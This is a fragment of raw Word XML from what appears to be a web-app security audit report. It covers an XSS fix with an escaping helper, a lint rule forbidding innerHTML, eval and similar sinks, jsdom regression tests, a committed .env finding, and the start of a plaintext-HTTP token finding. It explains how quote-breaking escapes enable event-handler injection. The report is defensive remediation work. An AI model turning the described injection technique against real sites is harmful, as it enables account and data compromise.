          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A rendering path that bypasses the framework's protection. The team's mental model was "React escapes for us" — correct for 23 of 24 pages, and wrong for the one that builds HTML by hand. The no-op sanitiser suggests the escaping once existed and was lost in a refactor with nothing to catch it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/escapeHtml.js , escaping all </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">five</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> significant characters rather than the usual three — " and ' matter because these templates interpolate into quoted attributes, where escaping only &lt; , &gt; and &amp; still allows an attacker to close the quote and add an event handler.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="354" w:right="16" w:hanging="250"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Applied where API data </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> each template rather than at each of the dozen ${...} sites, so there is one line per value to review instead of twelve — which is how the originals ended up with none.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="354" w:right="16" w:hanging="250"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cleanProductName restored: it now strips the parenthesised suffix </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> escapes.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="354" w:hanging="354"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A lint gate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so this cannot return. eslint.security.config.js forbids document.write , innerHTML , outerHTML , insertAdjacentHTML , dangerouslySetInnerHTML , eval and new Function .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="10188.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="45.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10188"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="10188"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1590"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7">
            <w:pPr>
              <w:spacing w:after="45"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 detail worth recording.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> The obvious ESLint rule does not work here. no-restricted-properties with {object:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
            <w:pPr>
              <w:spacing w:after="0" w:line="311" w:lineRule="auto"/>
              <w:ind w:left="45" w:hanging="4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'document', property: 'write'} only matches the bare identifier document . Every call site in this application is printWindow.document.write(...) , where the object is the member expression printWindow.document so the</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3" w:right="11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obvious rule silently matched </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">none of the seven</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">. The gate uses a custom AST selector instead. A security control that appears to work and does not is worse than none, because it stops anyone looking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15 regression tests. The central one parses the escaped payload with jsdom and asserts the browser sees </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one text node and zero </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : a structural proof rather than a substring check:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">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expect(escaped).not.toMatch(/[&lt;&gt;"']/);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">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host.innerHTML = `&lt;div class="product-name"&gt;${escaped}&lt;/div&gt;`;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">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expect(host.querySelectorAll("img")).toHaveLength(0);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">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expect(host.querySelector(".product-name").textContent).toBe(payload);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">V-14 · .env committed to the repository</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A05:2021 · CWE-540, CWE-538 · High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">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git ls-files | grep -i env</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">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.env</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">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 git log --diff-filter=A --format="%h %ad %s" --date=short -- .env</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">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b9653b 2025-12-06 env</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">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Root cause and this is the part that matters.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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.gitignore</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the stock Vite template: 27 lines covering</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> node_modules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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and editor directories, with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">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rule of any kind</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nothing prevented the commit and nothing warned afterwards.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">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file exposed the production API hostname and, in commented-out lines, an otherwise-undisclosed staging backend. Neither is a credential, so this is not the worst possible outcome but the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is what makes it serious: the file a developer will eventually put a real key into was being committed by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">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git rm --cached .env ; .gitignore extended with .env , .env.* , !.env.example . A documented .env.example added, stating plainly that anything prefixed VITE_ is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inlined into the public JavaScript bundle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the non-obvious part, and how a developer who treats .env as private storage publishes an API key to every visitor.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">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CI secret-scan job asserts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the .gitignore rule exists</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not merely that the file is currently absent. Checking only the current state would pass again the moment someone re-added it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="27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Not fully fixed: NF-5.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The hostnames remain in history.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="28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V-15 · Bearer tokens proxied over plaintext HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="192" w:before="280" w:line="265"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A02:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-319</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High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">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vercel.json:5 rewrote /api/:path* to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
